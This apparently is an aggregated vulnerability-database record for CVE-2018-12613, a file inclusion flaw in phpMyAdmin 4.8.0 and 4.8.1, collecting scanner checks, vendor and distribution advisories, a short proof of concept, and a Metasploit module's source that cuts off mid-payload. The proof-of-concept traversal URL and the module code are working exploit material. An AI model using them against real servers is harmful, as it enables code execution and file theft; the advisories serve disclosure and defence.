An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
{"openvas": [{"lastseen": "2019-05-29T18:32:35", "description": "The host is installed with phpMyAdmin and\n is prone to a file inclusion vulnerability.", "cvss3": {}, "published": "2018-06-26T00:00:00", "type": "openvas", "title": "phpMyAdmin File Inclusion Vulnerability (PMASA-2018-4)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813449", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813449", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# phpMyAdmin File Inclusion Vulnerability (PMASA-2018-4)-Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813449\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-12613\");\n script_bugtraq_id(104532);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-26 11:47:09 +0530 (Tue, 26 Jun 2018)\");\n script_name(\"phpMyAdmin File Inclusion Vulnerability (PMASA-2018-4)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with phpMyAdmin and\n is prone to a file inclusion vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error from a portion\n of code where pages are redirected and loaded within phpMyAdmin and an improper\n test for whitelisted pages.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to view and potentially execute files on the server.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin versions 4.8.0 and 4.8.1 on windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 4.8.2 or newer. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/44928\");\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2018-4\");\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe: CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(vers == \"4.8.0\" || vers == \"4.8.1\")\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.8.2\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "description": "The host is installed with phpMyAdmin and\n is prone to a file inclusion vulnerability.", "cvss3": {}, "published": "2018-06-26T00:00:00", "type": "openvas", "title": "phpMyAdmin File Inclusion Vulnerability (PMASA-2018-4)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813452", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813452", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# phpMyAdmin File Inclusion Vulnerability (PMASA-2018-4)-Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813452\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-12613\");\n script_bugtraq_id(104532);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-26 17:47:09 +0530 (Tue, 26 Jun 2018)\");\n script_name(\"phpMyAdmin File Inclusion Vulnerability (PMASA-2018-4)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with phpMyAdmin and\n is prone to a file inclusion vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error from a portion\n of code where pages are redirected and loaded within phpMyAdmin and an improper\n test for whitelisted pages.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to view and potentially execute files on the server.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin versions 4.8.0 and 4.8.1 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 4.8.2 or newer. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/44928\");\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2018-4\");\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"os_detection.nasl\", \"secpod_phpmyadmin_detect_900129.nasl\");\n script_mandatory_keys(\"Host/runs_unixoide\", \"phpMyAdmin/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe: CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(vers == \"4.8.0\" || vers == \"4.8.1\")\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.8.2\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-06-04T16:47:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-24T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for phpMyAdmin (openSUSE-SU-2018:1806-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12613", "CVE-2018-12581"], "modified": "2020-06-03T00:00:00", "id": "OPENVAS:1361412562310851799", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851799", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851799\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-24 05:45:58 +0200 (Sun, 24 Jun 2018)\");\n script_cve_id(\"CVE-2018-12581\", \"CVE-2018-12613\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for phpMyAdmin (openSUSE-SU-2018:1806-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for phpMyAdmin fixes multiple issues.\n\n Security issues fixed:\n\n * CVE-2018-12613: File inclusion and remote code execution attack\n (boo#1098751)\n\n * CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\n This update to version 4.8.2 also contains number of upstream bug fixes\n and improvements.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-669=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-669=1\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1806-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-06/msg00044.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.8.2~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:03", "description": "\nphpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-22T00:00:00", "type": "exploitpack", "title": "phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-22T00:00:00", "id": "EXPLOITPACK:DF440AF74FEF290DAC2A23160FAA342B", "href": "", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution\n# Date: 2018-06-21\n# Exploit Author: VulnSpy\n# Vendor Homepage: http://www.phpmyadmin.net\n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz\n# Version: 4.8.0, 4.8.1\n# Tested on: php7 mysql5\n# CVE : CVE-2018-12613\n\n1. Run SQL Query : select '<?php phpinfo();exit;?>'\n2. Include the session file :\nhttp://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-06-29T14:44:12", "description": "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an\nattacker can include (view and potentially execute) files on the server.\nThe vulnerability comes from a portion of code where pages are redirected\nand loaded within phpMyAdmin, and an improper test for whitelisted pages.\nAn attacker must be authenticated, except in the\n\"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify\nany host he/she is already in control of, and execute arbitrary code on\nphpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the\nlogin requirement and runs the vulnerable code without any authentication).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-21T00:00:00", "type": "ubuntucve", "title": "CVE-2018-12613", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-21T00:00:00", "id": "UB:CVE-2018-12613", "href": "https://ubuntu.com/security/CVE-2018-12613", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T15:29:49", "description": "phpmyadmin is vulnerable to remote code execution (RCE) attacks. The application does not properly check page validity when they are loaded or redirected, allowing a malicious user to view and execute files on the server.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-22T03:26:00", "type": "veracode", "title": "Remote Code Execution (RCE) Through File Inclusion", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2019-05-15T06:18:40", "id": "VERACODE:6836", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-6836/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-08-05T23:19:26", "description": "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \u201c\\\\(cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"\\\\)cfg[\u2018ServerDefault\u2019] = 0\u201d case (which bypasses the login requirement and runs the vulnerable code without any authentication).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-21T00:00:00", "type": "attackerkb", "title": "CVE-2018-12613", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2021-11-03T00:00:00", "id": "AKB:BA45FF30-F585-4D16-9F67-15082557C725", "href": "https://attackerkb.com/topics/yt30wKO8Gc/cve-2018-12613", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "phpmyadmin": [{"lastseen": "2023-06-23T15:09:46", "description": "## PMASA-2018-4\n\n**Announcement-ID:** PMASA-2018-4\n\n**Date:** 2018-06-19\n\n**Updated:** 2018-06-21\n\n### Summary\n\nFile inclusion and remote code execution attack\n\n### Description\n\nA flaw has been discovered where an attacker can include (view and potentially execute) files on the server.\n\nThe vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages.\n\nAn attacker must be authenticated, except in these situations:\n\n * $cfg['AllowArbitraryServer'] = true: attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin\n * $cfg['ServerDefault'] = 0: this bypasses the login and runs the vulnerable code without any authentication\n\n### Severity\n\nWe consider this to be severe.\n\n### Mitigation factor\n\nConfiguring PHP with a restrictive `open_basedir` can greatly restrict an attacker's ability to view files on the server. Vulnerable systems should not be run with the phpMyAdmin directives $cfg['AllowArbitraryServer'] = true or $cfg['ServerDefault'] = 0\n\n### Affected Versions\n\nphpMyAdmin 4.8.0 and 4.8.1 are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.8.2 or newer or apply patch listed below.\n\n### References\n\nHenry Huang, an independent security researcher, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.\n\nAssigned CVE ids: [CVE-2018-12613](<https://vulners.com/cve/CVE-2018-12613>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>)\n\n### Patches\n\nThe following commits have been made on the 4.8 branch to fix this issue:\n\n * [7662d02939fb3cf6f0d9ec32ac664401dcfe7490](<https://github.com/phpmyadmin/phpmyadmin/commit/7662d02939fb3cf6f0d9ec32ac664401dcfe7490>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-19T00:00:00", "type": "phpmyadmin", "title": "File inclusion and remote code execution attack", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-21T00:00:00", "id": "PHPMYADMIN:PMASA-2018-4", "href": "https://www.phpmyadmin.net/security/PMASA-2018-4/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-07-13T17:34:27", "description": "", "cvss3": {}, "published": "2018-07-12T00:00:00", "type": "packetstorm", "title": "phpMyAdmin Authenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-07-12T00:00:00", "id": "PACKETSTORM:148534", "href": "https://packetstormsecurity.com/files/148534/phpMyAdmin-Authenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'phpMyAdmin Authenticated Remote Code Execution', \n'Description' => %q{ \nphpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, \nwhich can be exploited post-authentication to execute PHP code by \napplication. The module has been tested with phpMyAdmin v4.8.1. \n}, \n'Author' => \n[ \n'ChaMd5', # Vulnerability discovery and PoC \n'Henry Huang', # Vulnerability discovery and PoC \n'Jacob Robles' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'BID', '104532' ], \n[ 'CVE', '2018-12613' ], \n[ 'CWE', '661' ], \n[ 'URL', 'https://www.phpmyadmin.net/security/PMASA-2018-4/' ], \n[ 'URL', 'https://www.secpulse.com/archives/72817.html' ], \n[ 'URL', 'https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/' ] \n], \n'Privileged' => false, \n'Platform' => [ 'php' ], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'Windows', {} ], \n[ 'Linux', {} ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jun 19 2018')) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"Base phpMyAdmin directory path\", '/phpmyadmin/']), \nOptString.new('USERNAME', [ true, \"Username to authenticate with\", 'root']), \nOptString.new('PASSWORD', [ false, \"Password to authenticate with\", '']) \n]) \nend \n \ndef check \nbegin \nres = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) }) \nrescue \nvprint_error(\"#{peer} - Unable to connect to server\") \nreturn Exploit::CheckCode::Unknown \nend \n \nif res.nil? || res.code != 200 \nvprint_error(\"#{peer} - Unable to query /js/messages.php\") \nreturn Exploit::CheckCode::Unknown \nend \n \n# v4.8.0 || 4.8.1 phpMyAdmin \nif res.body =~ /PMA_VERSION:\"(\\d+\\.\\d+\\.\\d+)\"/ \nversion = Gem::Version.new($1) \nvprint_status(\"#{peer} - phpMyAdmin version: #{version}\") \n \nif version == Gem::Version.new('4.8.0') || version == Gem::Version.new('4.8.1') \nreturn Exploit::CheckCode::Appears \nend \nreturn Exploit::CheckCode::Safe \nend \n \nreturn Exploit::CheckCode::Unknown \nend \n \ndef query(uri, qstring, cookies, token) \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(uri, 'import.php'), \n'cookie' => cookies, \n'vars_post' => Hash[{ \n'sql_query' => qstring, \n'db' => '', \n'table' => '', \n'token' => token \n}.to_a.shuffle] \n}) \nend \n \ndef lfi(uri, data_path, cookies, token) \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(uri, 'index.php'), \n'cookie' => cookies, \n'encode_params' => false, \n'vars_get' => { \n'target' => \"db_sql.php%253f#{'/..'*16}#{data_path}\" \n} \n}) \nend \n \ndef exploit \nunless check == Exploit::CheckCode::Appears \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable') \nend \n \nuri = target_uri.path \nvprint_status(\"#{peer} - Grabbing CSRF token...\") \n \nresponse = send_request_cgi({'uri' => uri}) \n \nif response.nil? \nfail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage grabbing CSRF token\") \nelsif response.body !~ /token\"\\s*value=\"(.*?)\"/ \nfail_with(Failure::NotFound, \"#{peer} - Couldn't find token. Is URI set correctly?\") \nend \ntoken = Rex::Text.html_decode($1) \n \nif target.name =~ /Automatic/ \n/\\((?<srv>Win.*)?\\)/ =~ response.headers['Server'] \nmytarget = srv.nil? ? 'Linux' : 'Windows' \nelse \nmytarget = target.name \nend \n \nvprint_status(\"#{peer} - Identified #{mytarget} target\") \n \n#Pull out the last two cookies \ncookies = response.get_cookies \ncookies = cookies.split[-2..-1].join(' ') \n \nvprint_status(\"#{peer} - Retrieved token #{token}\") \nvprint_status(\"#{peer} - Retrieved cookies #{cookies}\") \nvprint_status(\"#{peer} - Authenticating...\") \n \nlogin = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(uri, 'index.php'), \n'cookie' => cookies, \n'vars_post' => { \n'token' => token, \n'pma_username' => datastore['USERNAME'], \n'pma_password' => datastore['PASSWORD'] \n} \n}) \n \nif login.nil? || login.code != 302 \nfail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage\") \nend \n \n#Ignore the first cookie \ncookies = login.get_cookies \ncookies = cookies.split[1..-1].join(' ') \nvprint_status(\"#{peer} - Retrieved cookies #{cookies}\") \n \nlogin_check = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php'), \n'vars_get' => { 'token' => token }, \n'cookie' => cookies \n}) \n \nif login_check.nil? \nfail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage\") \nelsif login_check.body.include? 'Welcome to' \nfail_with(Failure::NoAccess, \"#{peer} - Authentication failed\") \nelsif login_check.body !~ /token\"\\s*value=\"(.*?)\"/ \nfail_with(Failure::NotFound, \"#{peer} - Couldn't find token. Is URI set correctly?\") \nend \ntoken = Rex::Text.html_decode($1) \n \nvprint_status(\"#{peer} - Authentication successful\") \n \n#Generating strings/payload \ndatabase = rand_text_alpha_lower(5) \ntable = rand_text_alpha_lower(5) \ncolumn = rand_text_alpha_lower(5) \ncol_val = \"'<?php 